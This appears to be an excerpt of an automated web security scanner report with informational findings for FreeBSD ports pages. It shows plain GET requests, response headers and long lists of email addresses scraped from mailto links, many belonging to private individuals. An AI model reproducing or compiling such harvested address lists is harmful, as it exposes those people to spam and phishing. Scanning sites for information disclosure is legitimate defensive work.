The following email addresses were disclosed in the response:

ache@FreeBSD.org
avatar@mmlab.cse.yzu.edu.tw
clsung@FreeBSD.org
daniel@netwalk.org
dinoex@FreeBSD.org
dk@farm.org
dougb@FreeBSD.org
dsh@vlink.ru
edwin@mavetju.org
ehaupt@FreeBSD.org
fehlner@gmx.de
fjoe@FreeBSD.org
fluffy@FreeBSD.org
gnome@FreeBSD.org
gslin@gslin.org
johans@FreeBSD.org
john@zoner.org
kde@FreeBSD.org
koma2@lovepeers.org
lasse@freebsdcluster.org
leeym@FreeBSD.org
lioux@FreeBSD.org
mail@ozzmosis.com
mandree@FreeBSD.org
mich@FreeBSD.org
miki@ceti.pl
miwi@FreeBSD.org
neal@nelson.name
netchild@FreeBSD.org
nivit@FreeBSD.org
obrien@FreeBSD.org
os@rsu.ru
pav@FreeBSD.org
perl@FreeBSD.org
pjenvey@groovie.org
ports@FreeBSD.org
ports@thepentagon.org
skv@FreeBSD.org
tdb@FreeBSD.org
thierry@FreeBSD.org
toxic@doobie.com
vd@FreeBSD.org
vk@vk.pp.ru

Request

GET /ports/news.html/x22 HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1467617764"
Last-Modified: Sun, 23 Jan 2011 02:29:32 GMT
Content-Length: 176619
Connection: close
Date: Mon, 24 Jan 2011 16:16:27 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: News</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/ht
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:netchild@FreeBSD.org">netchild@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vk@vk.pp.ru">vk@vk.pp.ru</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dsh@vlink.ru">dsh@vlink.ru</A>
...[SNIP]...
<A HREF="mailto:pjenvey@groovie.org">pjenvey@groovie.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mail@ozzmosis.com">mail@ozzmosis.com</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fluffy@FreeBSD.org">fluffy@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:koma2@lovepeers.org">koma2@lovepeers.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mandree@FreeBSD.org">mandree@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vd@FreeBSD.org">vd@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mich@FreeBSD.org">mich@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lasse@freebsdcluster.org">lasse@freebsdcluster.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dk@farm.org">dk@farm.org</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:toxic@doobie.com">toxic@doobie.com</A>
...[SNIP]...
<A HREF="mailto:ports@thepentagon.org">ports@thepentagon.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lioux@FreeBSD.org">lioux@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tdb@FreeBSD.org">tdb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:daniel@netwalk.org">daniel@netwalk.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fehlner@gmx.de">fehlner@gmx.de</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:john@zoner.org">john@zoner.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miki@ceti.pl">miki@ceti.pl</A>
...[SNIP]...
<A HREF="mailto:avatar@mmlab.cse.yzu.edu.tw">avatar@mmlab.cse.yzu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...

24.317. http://www.freebsd.org/ports/shells.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/shells.html

Issue detail

The following email addresses were disclosed in the response:

adamw@FreeBSD.org
alepulver@FreeBSD.org
araujo@FreeBSD.org
danielt@pilgerer.org
des@FreeBSD.org
dinoex@FreeBSD.org
fjoe@FreeBSD.org
freebsd-security@rikrose.net
garga@FreeBSD.org
joe@zircon.seattle.wa.us
knu@FreeBSD.org
ljrittle@acm.org
miwi@FreeBSD.org
obrien@FreeBSD.org
pav@FreeBSD.org
perl@FreeBSD.org
ports@FreeBSD.org
ports@eitanadler.com
quanstro@quanstro.net
rfarmer@predatorlabs.net
skreuzer@FreeBSD.org
smatsui@karashi.org
sylvio@FreeBSD.org
ume@FreeBSD.org
utisoft@gmail.com
vaida.bogdan@gmail.com
vvelox@vvelox.net

Request

GET /ports/shells.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1117702681"
Last-Modified: Sun, 23 Jan 2011 02:29:33 GMT
Content-Length: 50230
Connection: close
Date: Mon, 24 Jan 2011 16:17:20 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Shells</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:adamw@FreeBSD.org">adamw@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alepulver@FreeBSD.org">alepulver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:utisoft@gmail.com">utisoft@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rfarmer@predatorlabs.net">rfarmer@predatorlabs.net</A>
...[SNIP]...
<A HREF="mailto:ports@eitanadler.com">ports@eitanadler.com</A>
...[SNIP]...
<A HREF="mailto:ljrittle@acm.org">ljrittle@acm.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:knu@FreeBSD.org">knu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rfarmer@predatorlabs.net">rfarmer@predatorlabs.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danielt@pilgerer.org">danielt@pilgerer.org</A>
...[SNIP]...
<A HREF="mailto:vaida.bogdan@gmail.com">vaida.bogdan@gmail.com</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joe@zircon.seattle.wa.us">joe@zircon.seattle.wa.us</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-security@rikrose.net">freebsd-security@rikrose.net</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:smatsui@karashi.org">smatsui@karashi.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skreuzer@FreeBSD.org">skreuzer@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:quanstro@quanstro.net">quanstro@quanstro.net</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rfarmer@predatorlabs.net">rfarmer@predatorlabs.net</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:ume@FreeBSD.org">ume@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:des@FreeBSD.org">des@FreeBSD.org</A>
...[SNIP]...

24.318. http://www.freebsd.org/ports/tcl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/tcl.html

Issue detail

The following email addresses were disclosed in the response:

ant@monitor.deis.unical.it
bkoenig@alpha-tierchen.de
cowbert@gmail.com
dan@rucci.org
dinoex@FreeBSD.org
dsh@vlink.ru
edwin@mavetju.org
ehaupt@FreeBSD.org
erik@bz.bzflag.bz
erkkila@cc.jyu.fi
frank@fenor.de
girgen@FreeBSD.org
hokan@me.umn.edu
itetcu@FreeBSD.org
janos.mohacsi@bsd.hu
jhay@FreeBSD.org
kaduk-fbsd@mit.edu
kevlo@FreeBSD.org
mi@aldan.algebra.com
mm@FreeBSD.org
nishida@sfc.wide.ad.jp
nox@FreeBSD.org
ports@FreeBSD.Org
ports@FreeBSD.org
simon@olofsson.de
skv@FreeBSD.org
stas@FreeBSD.org
sylvio@FreeBSD.org

Request

GET /ports/tcl.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "880715865"
Last-Modified: Sun, 23 Jan 2011 02:29:33 GMT
Content-Length: 99244
Connection: close
Date: Mon, 24 Jan 2011 16:16:39 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Tcl</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/htm
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.Org">ports@FreeBSD.Org</A>
...[SNIP]...
<A HREF="mailto:dan@rucci.org">dan@rucci.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:erkkila@cc.jyu.fi">erkkila@cc.jyu.fi</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jhay@FreeBSD.org">jhay@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:girgen@FreeBSD.org">girgen@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cowbert@gmail.com">cowbert@gmail.com</A>
...[SNIP]...
<A HREF="mailto:hokan@me.umn.edu">hokan@me.umn.edu</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bkoenig@alpha-tierchen.de">bkoenig@alpha-tierchen.de</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:girgen@FreeBSD.org">girgen@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:janos.mohacsi@bsd.hu">janos.mohacsi@bsd.hu</A>
...[SNIP]...
<A HREF="mailto:girgen@FreeBSD.org">girgen@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:girgen@FreeBSD.org">girgen@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:simon@olofsson.de">simon@olofsson.de</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dsh@vlink.ru">dsh@vlink.ru</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dsh@vlink.ru">dsh@vlink.ru</A>
...[SNIP]...
<A HREF="mailto:frank@fenor.de">frank@fenor.de</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:frank@fenor.de">frank@fenor.de</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nishida@sfc.wide.ad.jp">nishida@sfc.wide.ad.jp</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nox@FreeBSD.org">nox@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ant@monitor.deis.unical.it">ant@monitor.deis.unical.it</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kaduk-fbsd@mit.edu">kaduk-fbsd@mit.edu</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kevlo@FreeBSD.org">kevlo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dsh@vlink.ru">dsh@vlink.ru</A>
...[SNIP]...

24.319. http://www.freebsd.org/ports/x11-fonts.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/x11-fonts.html

Issue detail

The following email addresses were disclosed in the response:

ache@FreeBSD.org
ashish@FreeBSD.org
bkoenig@alpha-tierchen.de
bsdports@gmail.com
buganini@gmail.com
c0rn@o2.pl
danfe@FreeBSD.org
dhn@FreeBSD.org
dinoex@FreeBSD.org
doceng@FreeBSD.org
dominic.marks@btinternet.com
duchateau.olivier@gmail.com
freebsd-emulation@FreeBSD.org
g.veniamin@googlemail.com
garga@FreeBSD.org
ginga-freebsd@ginganet.org
gnome@FreeBSD.org
gugod@gugod.org
h.eichmann@gmx.de
herbert.skuhra@gmx.at
hrs@FreeBSD.org
intron@intron.ac
jacula@FreeBSD.org
jsa@FreeBSD.org
kkonstan@duth.gr
koma2@lovepeers.org
kubito@gmail.com
lgfbsd@be-well.ilk.org
llwang@infor.org
m.seaman@infracaninophile.co.uk
maho@FreeBSD.org
makc@FreeBSD.org
manuel.giraud@gmail.com
mi@aldan.algebra.com
nareshov@gmail.com
nikola.lecic@anthesphoria.net
nobutaka@FreeBSD.org
nork@FreeBSD.org
novel@FreeBSD.org
obrien@FreeBSD.org
obscure9@gmail.com
olgeni@FreeBSD.org
oliver@FreeBSD.org
perl@FreeBSD.org
ports@FreeBSD.org
prudhvi-krishna-bsd@surapaneni.in
rafan@FreeBSD.org
sanpei@FreeBSD.org
saper@saper.info
sarumaru@jp.FreeBSD.org
stas@FreeBSD.org
sunpoet@FreeBSD.org
thierry@FreeBSD.org
toshi@tea.forus.or.jp
vlad@vlad.uz.ua
wxs@FreeBSD.org
